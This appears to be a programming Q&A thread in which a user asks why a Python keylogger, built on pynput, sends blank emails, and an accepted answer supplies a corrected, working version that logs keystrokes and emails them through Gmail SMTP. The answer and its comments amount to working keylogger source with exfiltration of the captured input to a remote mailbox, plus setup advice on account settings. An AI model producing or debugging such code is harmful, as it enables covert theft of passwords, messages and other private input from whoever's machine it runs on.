# Trying to log keystrokes and send them to my email but getting a blank email instead

Tags: python, email, keylogger

This code is supposed to log my keystrokes and send them to my email (which I took out of the code for now). I do get the emails however it doesn't send them with the keystrokes, every email is blank. Does anyone know how to fix this?

```
import smtplib
import pynput
from pynput.keyboard import Key, Listener

email = ""
password = ""
server = smtplib.SMTP_SSL("smtp.gmail.com", 465)
server.login(email, password)

full_log = ""
word = ""
email_char_limit = 10


def on_press(key):
    global word
    global full_log
    global email
    global email_char_limit

    if key == Key.space or key == Key.enter:
        word += " "
        full_log += word
        word = ""
        if len(full_log) >= email_char_limit:
            send_log()
            full_log = ""
    elif key == Key.shift or Key.shift_r:
        return
    elif key == Key.backspace:
        word = word[:-1]
    else:
        char: f"{key}"
        char = char[1:-1]
        word += char

    if key == Key.esc:
        return False


def send_log():
    server.sendmail(
        email,
        email,
        full_log
    )


with Listener(on_press=on_press) as listener:
    listener.join()
```

Answer (score 1, accepted):

I just made a few changes and got it working. There was an issue with your `full_log` variable. There was a mistake in the conditioning part of the first `elif` statement where your condition should be `key == Key.shift or key == Key.shift_r`. There was a mistake with `char: f"{key}"`. It should be `char = f"{key}"`. Two other important statements you forgot were

```py
full_log += word
word = ""
```

Those lines need to be included at the end so the words are concatenated to the `full_log` variable. Other than that every thing works fine now.

Below is the corrected version of your code.

```py
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import pynput
from pynput.keyboard import Key, Listener

full_log = ""
word = ""
email_char_limit = 10


def send_log(log):
    print(log)
    
    email_user = 'from mail address here'
    email_password = 'password'
    email_send = 'to mail address here'

    msg = MIMEMultipart()
    msg['From'] = email_user
    msg['To'] = email_send
    msg['Subject'] = subject

    body = log
    msg.attach(MIMEText(body, 'plain'))

    text = msg.as_string()
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.starttls()
    server.login(email_user, email_password)

    server.sendmail(email_user, email_send, text)
    server.quit()


def on_press(key):
    global word
    global full_log
    global email
    global email_char_limit

    if key == Key.space or key == Key.enter:
        word += " "
        full_log += word
        word = ""
        if len(full_log) >= email_char_limit:
            send_log(full_log)
            full_log = ""
    elif key == Key.shift or key == Key.shift_r:
        return None
    elif key == Key.backspace:
        word = word[:-1]
    else:
        char = f"{key}"
        char = char[1:-1]
        word += char

    full_log += word
    word = ""

    if key == Key.esc:
        return False

    #print(full_log)


with Listener(on_press=on_press) as listener:
    listener.join()
```

Comment: This works if I want to print the keystrokes but not if I am trying to email them to myself which is what I am trying to do

Comment: @CarsonKirshner with the code that you tried earlier I was not even able to print the `full_log` variable because you did not use `full_log += word`. And that is the reason why your mail was blank. Did you try to append your code for sending the email into the `send_log` function?

Comment: I edited my answer and included the code to send the captured keystrokes to a Gmail account. That is why I am using port `587`. Make sure to change your login credentials. In this case python tries to logon to your Gmail account. So you need to `Turn on access to less secured apps in your Google account settings`. Check that thread if you get a SMTP Authentication Error - https://stackoverflow.com/questions/26852128/smtpauthenticationerror-when-sending-mail-using-gmail-and-python